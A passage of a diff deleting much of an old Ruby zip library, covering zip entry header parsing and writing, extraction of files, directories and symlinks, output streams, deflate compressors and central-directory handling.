-    FSTYPE_VM_CMS = 4
-    FSTYPE_ATARI = 5
-    FSTYPE_HPFS = 6
-    FSTYPE_MAC = 7
-    FSTYPE_Z_SYSTEM = 8 
-    FSTYPE_CPM = 9
-    FSTYPE_TOPS20 = 10
-    FSTYPE_NTFS = 11
-    FSTYPE_QDOS = 12
-    FSTYPE_ACORN = 13
-    FSTYPE_VFAT = 14
-    FSTYPE_MVS = 15
-    FSTYPE_BEOS = 16
-    FSTYPE_TANDEM = 17
-    FSTYPE_THEOS = 18
-    FSTYPE_MAC_OSX = 19
-    FSTYPE_ATHEOS = 30
-
-    FSTYPES = {
-      FSTYPE_FAT => 'FAT'.freeze,
-      FSTYPE_AMIGA => 'Amiga'.freeze,
-      FSTYPE_VMS => 'VMS (Vax or Alpha AXP)'.freeze,
-      FSTYPE_UNIX => 'Unix'.freeze,
-      FSTYPE_VM_CMS => 'VM/CMS'.freeze,
-      FSTYPE_ATARI => 'Atari ST'.freeze,
-      FSTYPE_HPFS => 'OS/2 or NT HPFS'.freeze,
-      FSTYPE_MAC => 'Macintosh'.freeze,
-      FSTYPE_Z_SYSTEM => 'Z-System'.freeze,
-      FSTYPE_CPM => 'CP/M'.freeze,
-      FSTYPE_TOPS20 => 'TOPS-20'.freeze,
-      FSTYPE_NTFS => 'NTFS'.freeze,
-      FSTYPE_QDOS => 'SMS/QDOS'.freeze,
-      FSTYPE_ACORN => 'Acorn RISC OS'.freeze,
-      FSTYPE_VFAT => 'Win32 VFAT'.freeze,
-      FSTYPE_MVS => 'MVS'.freeze,
-      FSTYPE_BEOS => 'BeOS'.freeze,
-      FSTYPE_TANDEM => 'Tandem NSK'.freeze,
-      FSTYPE_THEOS => 'Theos'.freeze,
-      FSTYPE_MAC_OSX => 'Mac OS/X (Darwin)'.freeze,
-      FSTYPE_ATHEOS => 'AtheOS'.freeze,
-    }.freeze
-    
-    attr_accessor  :comment, :compressed_size, :crc, :extra, :compression_method, 
-      :name, :size, :localHeaderOffset, :zipfile, :fstype, :externalFileAttributes, :gp_flags, :header_signature
-
-    attr_accessor :follow_symlinks
-    attr_accessor :restore_times, :restore_permissions, :restore_ownership
-    attr_accessor :unix_uid, :unix_gid, :unix_perms
-
-    attr_reader :ftype, :filepath # :nodoc:
-    
-    # Returns the character encoding used for name and comment
-    def name_encoding
-      (@gp_flags & 0b100000000000) != 0 ? "utf8" : "CP437//"
-    end
-
-
-    # Converts string encoding
-    def encode_string(str, src, dst)
-      if str.respond_to?(:encode)
-        str.encode(dst, { :invalid => :replace, :undef => :replace, :replace => '' })
-      else
-        begin
-          Iconv.conv(dst, src, str)
-        rescue
-          raise ::RuntimeError, "Your installation does not support iconv (needed for utf8 conversion)"
-        end
-      end      
-    end
-
-    # Returns the name in the encoding specified by enc
-    def name_in(enc)
-      encode_string(@name, name_encoding, enc)
-    end
-
-    # Returns the comment in the encoding specified by enc
-    def comment_in(enc)
-      encode_string(@comment, name_encoding, enc)
-    end
-
-    def initialize(zipfile = "", name = "", comment = "", extra = "", 
-                   compressed_size = 0, crc = 0, 
-       compression_method = ZipEntry::DEFLATED, size = 0,
-       time  = Time.now)
-      super()
-      if name.starts_with("/")
-        raise ZipEntryNameError, "Illegal ZipEntry name '#{name}', name must not start with /" 
-      end
-      @localHeaderOffset = 0
-      @local_header_size = 0
-      @internalFileAttributes = 1
-      @externalFileAttributes = 0
-      @version = 52 # this library's version
-      @ftype = nil # unspecified or unknown
-      @filepath = nil
-      if Zip::RUNNING_ON_WINDOWS
-        @fstype = FSTYPE_FAT
-      else
-        @fstype = FSTYPE_UNIX
-      end
-      @zipfile = zipfile
-      @comment = comment
-      @compressed_size = compressed_size
-      @crc = crc
-      @extra = extra
-      @compression_method = compression_method
-      @name = name
-      @size = size
-      @time = time
-
-      @follow_symlinks = false
-
-      @restore_times = true
-      @restore_permissions = false
-      @restore_ownership = false
-
-# BUG: need an extra field to support uid/gid's
-      @unix_uid = nil
-      @unix_gid = nil
-      @unix_perms = nil
-#      @posix_acl = nil
-#      @ntfs_acl = nil
-
-      if name_is_directory?
-        @ftype = :directory
-      else
-        @ftype = :file
-      end
-
-      unless ZipExtraField === @extra
-        @extra = ZipExtraField.new(@extra.to_s)
-      end
-    end
-
-    def time
-      if @extra["UniversalTime"]
-        @extra["UniversalTime"].mtime
-      else
-        # Atandard time field in central directory has local time
-        # under archive creator. Then, we can't get timezone.
-        @time
-      end
-    end
-    alias :mtime :time
-    
-    def time=(aTime)
-      unless @extra.member?("UniversalTime")
-        @extra.create("UniversalTime")
-      end
-      @extra["UniversalTime"].mtime = aTime
-      @time = aTime
-    end
-
-    # Returns +true+ if the entry is a directory.
-    def directory?
-      raise ZipInternalError, "current filetype is unknown: #{self.inspect}" unless @ftype
-      @ftype == :directory
-    end
-    alias :is_directory :directory?
-
-    # Returns +true+ if the entry is a file.
-    def file?
-      raise ZipInternalError, "current filetype is unknown: #{self.inspect}" unless @ftype
-      @ftype == :file
-    end
-
-    # Returns +true+ if the entry is a symlink.
-    def symlink?
-      raise ZipInternalError, "current filetype is unknown: #{self.inspect}" unless @ftype
-      @ftype == :symlink
-    end
-
-    def name_is_directory?  #:nodoc:all
-      (%r{\/$} =~ @name) != nil
-    end
-
-    def local_entry_offset  #:nodoc:all
-      localHeaderOffset + @local_header_size
-    end
-    
-    def calculate_local_header_size  #:nodoc:all
-      LOCAL_ENTRY_STATIC_HEADER_LENGTH + (@name ?  @name.size : 0) + (@extra ? @extra.local_size : 0)
-    end
-
-    def cdir_header_size  #:nodoc:all
-      CDIR_ENTRY_STATIC_HEADER_LENGTH  + (@name ?  @name.size : 0) + 
-  (@extra ? @extra.c_dir_size : 0) + (@comment ? @comment.size : 0)
-    end
-    
-    def next_header_offset  #:nodoc:all
-      local_entry_offset + self.compressed_size
-    end
-
-    # Extracts entry to file destPath (defaults to @name).
-    def extract(destPath = @name, &onExistsProc)
-      onExistsProc ||= proc { false }
-
-      if directory?
-        create_directory(destPath, &onExistsProc)
-      elsif file?
-        write_file(destPath, &onExistsProc) 
-      elsif symlink?
-        create_symlink(destPath, &onExistsProc)
-      else
-        raise RuntimeError, "unknown file type #{self.inspect}"
-      end
-
-      self
-    end
-
-    def to_s
-      @name
-    end
-    
-    protected
-    
-    def ZipEntry.read_zip_short(io) # :nodoc:
-      io.read(2).unpack('v')[0]
-    end
-    
-    def ZipEntry.read_zip_long(io) # :nodoc:
-      io.read(4).unpack('V')[0]
-    end
-    public
-    
-    LOCAL_ENTRY_SIGNATURE = 0x04034b50
-    LOCAL_ENTRY_STATIC_HEADER_LENGTH = 30
-    LOCAL_ENTRY_TRAILING_DESCRIPTOR_LENGTH = 4+4+4
-    VERSION_NEEDED_TO_EXTRACT = 10
-
-    def read_local_entry(io)  #:nodoc:all
-      @localHeaderOffset = io.tell
-      staticSizedFieldsBuf = io.read(LOCAL_ENTRY_STATIC_HEADER_LENGTH)
-      unless (staticSizedFieldsBuf.size==LOCAL_ENTRY_STATIC_HEADER_LENGTH)
-        raise ZipError, "Premature end of file. Not enough data for zip entry local header"
-      end
-      
-      @header_signature       ,
-      @version          ,
-      @fstype           ,
-      @gp_flags          ,
-      @compression_method,
-      lastModTime       ,
-      lastModDate       ,
-      @crc              ,
-      @compressed_size   ,
-      @size             ,
-      nameLength        ,
-      extraLength       = staticSizedFieldsBuf.unpack('VCCvvvvVVVvv') 
-
-      unless (@header_signature == LOCAL_ENTRY_SIGNATURE)
-        raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'"
-      end
-      set_time(lastModDate, lastModTime)
-
-      
-      @name              = io.read(nameLength)
-      extra              = io.read(extraLength)
-
-      if (extra && extra.length != extraLength)
-        raise ZipError, "Truncated local zip entry header"
-      else
-        if ZipExtraField === @extra
-          @extra.merge(extra)
-        else
-          @extra = ZipExtraField.new(extra)
-        end
-      end
-      @local_header_size = calculate_local_header_size
-    end
-    
-    def ZipEntry.read_local_entry(io)
-      entry = new(io.path)
-      entry.read_local_entry(io)
-      return entry
-    rescue ZipError
-      return nil
-    end
-  
-    def write_local_entry(io)   #:nodoc:all
-      @localHeaderOffset = io.tell
-      
-      io << 
-        [LOCAL_ENTRY_SIGNATURE    ,
-        VERSION_NEEDED_TO_EXTRACT , # version needed to extract
-        0                         , # @gp_flags                  ,
-        @compression_method        ,
-        @time.to_binary_dos_time     , # @lastModTime              ,
-        @time.to_binary_dos_date     , # @lastModDate              ,
-        @crc                      ,
-        @compressed_size           ,
-        @size                     ,
-        @name ? @name.length   : 0,
-        @extra? @extra.local_length : 0 ].pack('VvvvvvVVVvv')
-      io << @name
-      io << (@extra ? @extra.to_local_bin : "")
-    end
-    
-    CENTRAL_DIRECTORY_ENTRY_SIGNATURE = 0x02014b50
-    CDIR_ENTRY_STATIC_HEADER_LENGTH = 46
-    
-    def read_c_dir_entry(io)  #:nodoc:all
-      staticSizedFieldsBuf = io.read(CDIR_ENTRY_STATIC_HEADER_LENGTH)
-      unless (staticSizedFieldsBuf.size == CDIR_ENTRY_STATIC_HEADER_LENGTH)
-        raise ZipError, "Premature end of file. Not enough data for zip cdir entry header"
-      end
-
-      @header_signature          ,
-      @version               , # version of encoding software
-      @fstype                , # filesystem type
-      @versionNeededToExtract,
-      @gp_flags               ,
-      @compression_method     ,
-      lastModTime            ,
-      lastModDate            ,
-      @crc                   ,
-      @compressed_size        ,
-      @size                  ,
-      nameLength             ,
-      extraLength            ,
-      commentLength          ,
-      diskNumberStart        ,
-      @internalFileAttributes,
-      @externalFileAttributes,
-      @localHeaderOffset     ,
-      @name                  ,
-      @extra                 ,
-      @comment               = staticSizedFieldsBuf.unpack('VCCvvvvvVVVvvvvvVV')
-
-      unless (@header_signature == CENTRAL_DIRECTORY_ENTRY_SIGNATURE)
-        raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'"
-      end
-      set_time(lastModDate, lastModTime)
-      
-      @name                  = io.read(nameLength)
-      if ZipExtraField === @extra
-        @extra.merge(io.read(extraLength))
-      else
-        @extra = ZipExtraField.new(io.read(extraLength))
-      end
-      @comment               = io.read(commentLength)
-      unless (@comment && @comment.length == commentLength)
-        raise ZipError, "Truncated cdir zip entry header"
-      end
-
-      case @fstype
-      when FSTYPE_UNIX
-        @unix_perms = (@externalFileAttributes >> 16) & 07777
-
-        case (@externalFileAttributes >> 28)
-        when 04
-          @ftype = :directory
-        when 010
-          @ftype = :file
-        when 012
-          @ftype = :symlink
-        else
-          raise ZipInternalError, "unknown file type #{'0%o' % (@externalFileAttributes >> 28)}"
-        end
-      else
-        if name_is_directory?
-          @ftype = :directory
-        else
-          @ftype = :file
-        end
-      end
-      @local_header_size = calculate_local_header_size
-    end
-    
-    def ZipEntry.read_c_dir_entry(io)  #:nodoc:all
-      entry = new(io.path)
-      entry.read_c_dir_entry(io)
-      return entry
-    rescue ZipError
-      return nil
-    end
-
-    def file_stat(path)	# :nodoc:
-      if @follow_symlinks
-        return File::stat(path)
-      else
-        return File::lstat(path)
-      end
-    end
-
-    def get_extra_attributes_from_path(path)	# :nodoc:
-      unless Zip::RUNNING_ON_WINDOWS
-        stat = file_stat(path)
-        @unix_uid = stat.uid
-        @unix_gid = stat.gid
-        @unix_perms = stat.mode & 07777
-      end
-    end
-
-    def set_extra_attributes_on_path(destPath)	# :nodoc:
-      return unless (file? or directory?)
-
-      case @fstype
-      when FSTYPE_UNIX
-        # BUG: does not update timestamps into account
-        # ignore setuid/setgid bits by default.  honor if @restore_ownership
-        unix_perms_mask = 01777
-        unix_perms_mask = 07777 if (@restore_ownership)
-        FileUtils::chmod(@unix_perms & unix_perms_mask, destPath) if (@restore_permissions && @unix_perms)
-        FileUtils::chown(@unix_uid, @unix_gid, destPath) if (@restore_ownership && @unix_uid && @unix_gid && Process::egid == 0)
-        # File::utimes()
-      end
-    end
-
-    def write_c_dir_entry(io)  #:nodoc:all
-      case @fstype
-      when FSTYPE_UNIX
-        ft = nil
-        case @ftype
-        when :file
-          ft = 010
-          @unix_perms ||= 0644
-        when :directory
-          ft = 004
-          @unix_perms ||= 0755
-        when :symlink
-          ft = 012
-          @unix_perms ||= 0755
-        else
-          raise ZipInternalError, "unknown file type #{self.inspect}"
-        end
-
-        @externalFileAttributes = (ft << 12 | (@unix_perms & 07777)) << 16
-      end
-
-      io << 
-  [CENTRAL_DIRECTORY_ENTRY_SIGNATURE,
-        @version                          , # version of encoding software
-  @fstype                           , # filesystem type
-  VERSION_NEEDED_TO_EXTRACT         , # @versionNeededToExtract           ,
-  0                                 , # @gp_flags                          ,
-  @compression_method                ,
-        @time.to_binary_dos_time             , # @lastModTime                      ,
-  @time.to_binary_dos_date             , # @lastModDate                      ,
-  @crc                              ,
-  @compressed_size                   ,
-  @size                             ,
-  @name  ?  @name.length  : 0       ,
-  @extra ? @extra.c_dir_length : 0  ,
-  @comment ? comment.length : 0     ,
-  0                                 , # disk number start
-  @internalFileAttributes           , # file type (binary=0, text=1)
-  @externalFileAttributes           , # native filesystem attributes
-  @localHeaderOffset                ,
-  @name                             ,
-  @extra                            ,
-  @comment                          ].pack('VCCvvvvvVVVvvvvvVV')
-
-      io << @name
-      io << (@extra ? @extra.to_c_dir_bin : "")
-      io << @comment
-    end
-    
-    def == (other)
-      return false unless other.class == self.class
-      # Compares contents of local entry and exposed fields
-      (@compression_method == other.compression_method &&
-       @crc               == other.crc		     &&
-       @compressed_size   == other.compressed_size   &&
-       @size              == other.size	             &&
-       @name              == other.name	             &&
-       @extra             == other.extra             &&
-       @filepath          == other.filepath          &&
-       self.time.dos_equals(other.time))
-    end
-
-    def <=> (other)
-      return to_s <=> other.to_s
-    end
-
-    # Returns an IO like object for the given ZipEntry.
-    # Warning: may behave weird with symlinks.
-    def get_input_stream(&aProc)
-      if @ftype == :directory
-          return yield(NullInputStream.instance) if block_given?
-          return NullInputStream.instance
-      elsif @filepath
-        case @ftype
-        when :file
-          return File.open(@filepath, "rb", &aProc)
-
-        when :symlink
-          linkpath = File::readlink(@filepath)
-          stringio = StringIO.new(linkpath)
-          return yield(stringio) if block_given?
-          return stringio
-        else
-          raise "unknown @ftype #{@ftype}"
-        end
-      else
-        zis = ZipInputStream.new(@zipfile, localHeaderOffset)
-        zis.get_next_entry
-        if block_given?
-          begin
-      return yield(zis)
-    ensure
-      zis.close
-    end
-        else
-    return zis
-        end
-      end
-    end
-
-    def gather_fileinfo_from_srcpath(srcPath) # :nodoc:
-      stat = file_stat(srcPath)
-      case stat.ftype
-      when 'file'
-        if name_is_directory?
-          raise ArgumentError,
-      "entry name '#{newEntry}' indicates directory entry, but "+
-      "'#{srcPath}' is not a directory"
-        end
-        @ftype = :file
-      when 'directory'
-        if ! name_is_directory?
-          @name += "/"
-        end
-        @ftype = :directory
-      when 'link'
-        if name_is_directory?
-          raise ArgumentError,
-      "entry name '#{newEntry}' indicates directory entry, but "+
-      "'#{srcPath}' is not a directory"
-        end
-        @ftype = :symlink
-      else
-      	raise RuntimeError, "unknown file type: #{srcPath.inspect} #{stat.inspect}"
-      end
-
-      @filepath = srcPath
-      get_extra_attributes_from_path(@filepath)
-    end
-
-    def write_to_zip_output_stream(aZipOutputStream)  #:nodoc:all
-      if @ftype == :directory
-        aZipOutputStream.put_next_entry(self)
-      elsif @filepath
-        aZipOutputStream.put_next_entry(self)
-        get_input_stream { |is| IOExtras.copy_stream(aZipOutputStream, is) } 
-      else
-        aZipOutputStream.copy_raw_entry(self)
-      end
-    end
-
-    def parent_as_string
-      entry_name = name.chomp("/")
-      slash_index = entry_name.rindex("/")
-      slash_index ? entry_name.slice(0, slash_index+1) : nil
-    end
-
-    def get_raw_input_stream(&aProc)
-      File.open(@zipfile, "rb", &aProc)
-    end
-
-    private
-
-    def set_time(binaryDosDate, binaryDosTime)
-      @time = Time.parse_binary_dos_format(binaryDosDate, binaryDosTime)
-    rescue ArgumentError
-      puts "Invalid date/time in zip entry"
-    end
-
-    def write_file(destPath, continueOnExistsProc = proc { false })
-      if File.exists?(destPath) && ! yield(self, destPath)
-  raise ZipDestinationFileExistsError,
-    "Destination '#{destPath}' already exists"
-      end
-      File.open(destPath, "wb") do |os|
-        get_input_stream do |is|
-          set_extra_attributes_on_path(destPath)
-
-          buf = ''
-          while buf = is.sysread(Decompressor::CHUNK_SIZE, buf)
-            os << buf
-          end
-        end
-      end
-    end
-    
-    def create_directory(destPath)
-      if File.directory? destPath
-  return
-      elsif File.exists? destPath
-  if block_given? && yield(self, destPath)
-    FileUtils::rm_f destPath
-  else
-    raise ZipDestinationFileExistsError,
-      "Cannot create directory '#{destPath}'. "+
-      "A file already exists with that name"
-  end
-      end
-      Dir.mkdir destPath
-      set_extra_attributes_on_path(destPath)
-    end
-
-# BUG: create_symlink() does not use &onExistsProc
-    def create_symlink(destPath)
-      stat = nil
-      begin
-        stat = File::lstat(destPath)
-      rescue Errno::ENOENT
-      end
-
-      io = get_input_stream
-      linkto = io.read
-
-      if stat
-        if stat.symlink?
-          if File::readlink(destPath) == linkto
-            return
-          else
-            raise ZipDestinationFileExistsError,
-              "Cannot create symlink '#{destPath}'. "+
-              "A symlink already exists with that name"
-          end
-        else
-    raise ZipDestinationFileExistsError,
-      "Cannot create symlink '#{destPath}'. "+
-      "A file already exists with that name"
-        end
-      end
-
-      File::symlink(linkto, destPath)
-    end
-  end
-
-
-  # ZipOutputStream is the basic class for writing zip files. It is 
-  # possible to create a ZipOutputStream object directly, passing 
-  # the zip file name to the constructor, but more often than not 
-  # the ZipOutputStream will be obtained from a ZipFile (perhaps using the 
-  # ZipFileSystem interface) object for a particular entry in the zip 
-  # archive.
-  #
-  # A ZipOutputStream inherits IOExtras::AbstractOutputStream in order 
-  # to provide an IO-like interface for writing to a single zip 
-  # entry. Beyond methods for mimicking an IO-object it contains 
-  # the method put_next_entry that closes the current entry 
-  # and creates a new.
-  #
-  # Please refer to ZipInputStream for example code.
-  #
-  # java.util.zip.ZipOutputStream is the original inspiration for this 
-  # class.
-
-  class ZipOutputStream
-    include IOExtras::AbstractOutputStream
-
-    attr_accessor :comment
-
-    # Opens the indicated zip file. If a file with that name already
-    # exists it will be overwritten.
-    def initialize(fileName)
-      super()
-      @fileName = fileName
-      @outputStream = File.new(@fileName, "wb")
-      @entrySet = ZipEntrySet.new
-      @compressor = NullCompressor.instance
-      @closed = false
-      @currentEntry = nil
-      @comment = nil
-    end
-
-    # Same as #initialize but if a block is passed the opened
-    # stream is passed to the block and closed when the block
-    # returns.    
-    def ZipOutputStream.open(fileName)
-      return new(fileName) unless block_given?
-      zos = new(fileName)
-      yield zos
-    ensure
-      zos.close if zos
-    end
-
-    # Closes the stream and writes the central directory to the zip file
-    def close
-      return if @closed
-      finalize_current_entry
-      update_local_headers
-      write_central_directory
-      @outputStream.close
-      @closed = true
-    end
-
-    # Closes the current entry and opens a new for writing.
-    # +entry+ can be a ZipEntry object or a string.
-    def put_next_entry(entryname, comment = nil, extra = nil, compression_method = ZipEntry::DEFLATED,  level = Zlib::DEFAULT_COMPRESSION)
-      raise ZipError, "zip stream is closed" if @closed
-      new_entry = ZipEntry.new(@fileName, entryname.to_s)
-      new_entry.comment = comment if !comment.nil?
-      if (!extra.nil?)
-        new_entry.extra = ZipExtraField === extra ? extra : ZipExtraField.new(extra.to_s)
-      end
-      new_entry.compression_method = compression_method
-      init_next_entry(new_entry, level)
-      @currentEntry = new_entry
-    end
-
-    def copy_raw_entry(entry)
-      entry = entry.dup
-      raise ZipError, "zip stream is closed" if @closed
-      raise ZipError, "entry is not a ZipEntry" if !entry.kind_of?(ZipEntry)
-      finalize_current_entry
-      @entrySet << entry
-      src_pos = entry.local_entry_offset
-      entry.write_local_entry(@outputStream)
-      @compressor = NullCompressor.instance
-      entry.get_raw_input_stream { 
-  |is| 
-  is.seek(src_pos, IO::SEEK_SET)
-        IOExtras.copy_stream_n(@outputStream, is, entry.compressed_size)
-      }
-      @compressor = NullCompressor.instance
-      @currentEntry = nil
-    end
-
-    private
-    def finalize_current_entry
-      return unless @currentEntry
-      finish
-      @currentEntry.compressed_size = @outputStream.tell - @currentEntry.localHeaderOffset - 
-  @currentEntry.calculate_local_header_size
-      @currentEntry.size = @compressor.size
-      @currentEntry.crc = @compressor.crc
-      @currentEntry = nil
-      @compressor = NullCompressor.instance
-    end
-    
-    def init_next_entry(entry, level = Zlib::DEFAULT_COMPRESSION)
-      finalize_current_entry
-      @entrySet << entry
-      entry.write_local_entry(@outputStream)
-      @compressor = get_compressor(entry, level)
-    end
-
-    def get_compressor(entry, level)
-      case entry.compression_method
-  when ZipEntry::DEFLATED then Deflater.new(@outputStream, level)
-  when ZipEntry::STORED   then PassThruCompressor.new(@outputStream)
-      else raise ZipCompressionMethodError, 
-    "Invalid compression method: '#{entry.compression_method}'"
-      end
-    end
-
-    def update_local_headers
-      pos = @outputStream.tell
-      @entrySet.each {
-  |entry|
-  @outputStream.pos = entry.localHeaderOffset
-  entry.write_local_entry(@outputStream)
-      }
-      @outputStream.pos = pos
-    end
-
-    def write_central_directory
-      cdir = ZipCentralDirectory.new(@entrySet, @comment)
-      cdir.write_to_stream(@outputStream)
-    end
-
-    protected
-
-    def finish
-      @compressor.finish
-    end
-
-    public
-    # Modeled after IO.<<
-    def << (data)
-      @compressor << data
-    end
-  end
-  
-  
-  class Compressor #:nodoc:all
-    def finish
-    end
-  end
-  
-  class PassThruCompressor < Compressor #:nodoc:all
-    def initialize(outputStream)
-      super()
-      @outputStream = outputStream
-      @crc = Zlib::crc32
-      @size = 0
-    end
-    
-    def << (data)
-      val = data.to_s
-      @crc = Zlib::crc32(val, @crc)
-      @size += val.size
-      @outputStream << val
-    end
-
-    attr_reader :size, :crc
-  end
-
-  class NullCompressor < Compressor #:nodoc:all
-    include Singleton
-
-    def << (data)
-      raise IOError, "closed stream"
-    end
-
-    attr_reader :size, :compressed_size
-  end
-
-  class Deflater < Compressor #:nodoc:all
-    def initialize(outputStream, level = Zlib::DEFAULT_COMPRESSION)
-      super()
-      @outputStream = outputStream
-      @zlibDeflater = Zlib::Deflate.new(level, -Zlib::MAX_WBITS)
-      @size = 0
-      @crc = Zlib::crc32
-    end
-    
-    def << (data)
-      val = data.to_s
-      @crc = Zlib::crc32(val, @crc)
-      @size += val.size
-      @outputStream << @zlibDeflater.deflate(data)
-    end
-
-    def finish
-      until @zlibDeflater.finished?
-  @outputStream << @zlibDeflater.finish
-      end
-    end
-
-    attr_reader :size, :crc
-  end
-  
-
-  class ZipEntrySet #:nodoc:all
-    include Enumerable
-    
-    def initialize(anEnumerable = [])
-      super()
-      @entrySet = {}
-      anEnumerable.each { |o| push(o) }
-    end
-
-    def include?(entry)
-      @entrySet.include?(entry.to_s)
-    end
-
-    def <<(entry)
-      @entrySet[entry.to_s] = entry
-    end
-    alias :push :<<
-
-    def size
-      @entrySet.size
-    end
-    alias :length :size
-
-    def delete(entry)
-      @entrySet.delete(entry.to_s) ? entry : nil
-    end
-
-    def each(&aProc)
-      @entrySet.values.each(&aProc)
-    end
-
-    def entries
-      @entrySet.values
-    end
-
-    # deep clone
-    def dup
-      newZipEntrySet = ZipEntrySet.new(@entrySet.values.map { |e| e.dup })
-    end
-
-    def == (other)
-      return false unless other.kind_of?(ZipEntrySet)
-      return @entrySet == other.entrySet      
-    end
-
-    def parent(entry)
-      @entrySet[entry.parent_as_string]
-    end
-
-    def glob(pattern, flags = File::FNM_PATHNAME|File::FNM_DOTMATCH)
-      entries.select { 
-  |entry| 
-  File.fnmatch(pattern, entry.name.chomp('/'), flags) 
-      } 
-    end	
-
-#TODO    attr_accessor :auto_create_directories
-    protected
-    attr_accessor :entrySet
-  end
-
-
-  class ZipCentralDirectory
-    include Enumerable
-    
-    END_OF_CENTRAL_DIRECTORY_SIGNATURE = 0x06054b50
-    MAX_END_OF_CENTRAL_DIRECTORY_STRUCTURE_SIZE = 65536 + 18
-    STATIC_EOCD_SIZE = 22
-
-    attr_reader :comment
-
-    # Returns an Enumerable containing the entries.
-    def entries
-      @entrySet.entries
-    end
-
-    def initialize(entries = ZipEntrySet.new, comment = "")  #:nodoc:
-      super()
-      @entrySet = entries.kind_of?(ZipEntrySet) ? entries : ZipEntrySet.new(entries)
-      @comment = comment
-    end
-
-    def write_to_stream(io)  #:nodoc:
-      offset = io.tell
-      @entrySet.each { |entry| entry.write_c_dir_entry(io) }
-      write_e_o_c_d(io, offset)
-    end
-
-    def write_e_o_c_d(io, offset)  #:nodoc:
-      io <<
-  [END_OF_CENTRAL_DIRECTORY_SIGNATURE,
-        0                                  , # @numberOfThisDisk
-  0                                  , # @numberOfDiskWithStartOfCDir
-  @entrySet? @entrySet.size : 0        ,
-  @entrySet? @entrySet.size : 0        ,
-  cdir_size                           ,
-  offset                             ,
-  @comment ? @comment.length : 0     ].pack('VvvvvVVv')
-      io << @comment
-    end
-    private :write_e_o_c_d
-
-    def cdir_size  #:nodoc:
-      # does not include eocd
-      @entrySet.inject(0) { |value, entry| entry.cdir_header_size + value }
-    end
-    private :cdir_size
-
-    def read_e_o_c_d(io) #:nodoc:
-      buf = get_e_o_c_d(io)
-      @numberOfThisDisk                     = ZipEntry::read_zip_short(buf)
-      @numberOfDiskWithStartOfCDir          = ZipEntry::read_zip_short(buf)
-      @totalNumberOfEntriesInCDirOnThisDisk = ZipEntry::read_zip_short(buf)
-      @size                                 = ZipEntry::read_zip_short(buf)
-      @sizeInBytes                          = ZipEntry::read_zip_long(buf)
-      @cdirOffset                           = ZipEntry::read_zip_long(buf)
-      commentLength                         = ZipEntry::read_zip_short(buf)
-      @comment                              = buf.read(commentLength)
-      # remove trailing \n symbol
-      buf.chomp!
-      raise ZipError, "Zip consistency problem while reading eocd structure" unless buf.size == 0
-    end
-    
-    def read_central_directory_entries(io)  #:nodoc:
-      begin
-  io.seek(@cdirOffset, IO::SEEK_SET)
-      rescue Errno::EINVAL
-  raise ZipError, "Zip consistency problem while reading central directory entry"
-      end
-      @entrySet = ZipEntrySet.new
-      @size.times {
-  @entrySet << ZipEntry.read_c_dir_entry(io)
-      }
-    end
-    
-    def read_from_stream(io)  #:nodoc:
-      read_e_o_c_d(io)
-      read_central_directory_entries(io)
-    end
-    
-    def get_e_o_c_d(io)  #:nodoc:
-      begin
-  io.seek(-MAX_END_OF_CENTRAL_DIRECTORY_STRUCTURE_SIZE, IO::SEEK_END)
-      rescue Errno::EINVAL
-  io.seek(0, IO::SEEK_SET)
-      rescue Errno::EFBIG # FreeBSD 4.9 raise Errno::EFBIG instead of Errno::EINVAL
-  io.seek(0, IO::SEEK_SET)
-      end
-      
-      # 'buf = io.read' substituted with lump of code to work around FreeBSD 4.5 issue
-      retried = false
-      buf = nil
-      begin
-        buf = io.read
-      rescue Errno::EFBIG # FreeBSD 4.5 may raise Errno::EFBIG
-        raise if (retried)
-        retried = true
-  
-        io.seek(0, IO::SEEK_SET)
-        retry
-      end
-
-      sigIndex = buf.rindex([END_OF_CENTRAL_DIRECTORY_SIGNATURE].pack('V'))
-      raise ZipError, "Zip end of central directory signature not found" unless sigIndex
-      buf=buf.slice!((sigIndex+4)...(buf.size))
-      def buf.read(count)
-  slice!(0, count)
-      end
-      return buf
-    end
-
-    # For iterating over the entries.
-    def each(&proc)
-      @entrySet.each(&proc)
-    end
-
-    # Returns the number of entries in the central directory (and 
-    # consequently in the zip archive).
-    def size
-      @entrySet.size
-    end
-
-    def ZipCentralDirectory.read_from_stream(io)  #:nodoc:
-      cdir  = new
-      cdir.read_from_stream(io)
-      return cdir
-    rescue ZipError
-      return nil
-    end
-
-    def == (other) #:nodoc:
-      return false unless other.kind_of?(ZipCentralDirectory)
-      @entrySet.entries.sort == other.entries.sort && comment == other.comment
-    end
-  end
-  
-  
-  class ZipError < StandardError ; end
-
-  class ZipEntryExistsError            < ZipError; end
-  class ZipDestinationFileExistsError  < ZipError; end
-  class ZipCompressionMethodError      < ZipError; end
-  class ZipEntryNameError              < ZipError; end
-  class ZipInternalError               < ZipError; end
-
-  # ZipFile is modeled after java.util.zip.ZipFile from the Java SDK.
-  # The most important methods are those inherited from
-  # ZipCentralDirectory for accessing information about the entries in
-  # the archive and methods such as get_input_stream and
-  # get_output_stream for reading from and writing entries to the
-  # archive. The class includes a few convenience methods such as
-  # #extract for extracting entries to the filesystem, and #remove,
-  # #replace, #rename and #mkdir for making simple modifications to
-  # the archive.
-  #
-  # Modifications to a zip archive are not committed until #commit or
-  # #close is called. The method #open accepts a block following 
-  # the pattern from File.open offering a simple way to 
-  # automatically close the archive when the block returns. 
-  #
-  # The following example opens zip archive <code>my.zip</code> 
-  # (creating it if it doesn't exist) and adds an entry 
-  # <code>first.txt</code> and a directory entry <code>a_dir</code> 
-  # to it.
-  #
-  #   require 'zip/zip'
-  #   
-  #   Zip::ZipFile.open("my.zip", Zip::ZipFile::CREATE) {
-  #    |zipfile|
-  #     zipfile.get_output_stream("first.txt") { |f| f.puts "Hello from ZipFile" }
-  #     zipfile.mkdir("a_dir")
-  #   }
-  #
-  # The next example reopens <code>my.zip</code> writes the contents of
-  # <code>first.txt</code> to standard out and deletes the entry from 
-  # the archive.
-  #
-  #   require 'zip/zip'
-  #   
-  #   Zip::ZipFile.open("my.zip", Zip::ZipFile::CREATE) {
-  #     |zipfile|
-  #     puts zipfile.read("first.txt")
-  #     zipfile.remove("first.txt")
-  #   }
-  #
-  # ZipFileSystem offers an alternative API that emulates ruby's 
-  # interface for accessing the filesystem, ie. the File and Dir classes.
-  
-  class ZipFile < ZipCentralDirectory
-
-    CREATE = 1
-
-    attr_reader :name
-
-    # default -> false
-    attr_accessor :restore_ownership
-    # default -> false
-    attr_accessor :restore_permissions
-    # default -> true
-    attr_accessor :restore_times
-
-    # Opens a zip archive. Pass true as the second parameter to create
-    # a new archive if it doesn't exist already.
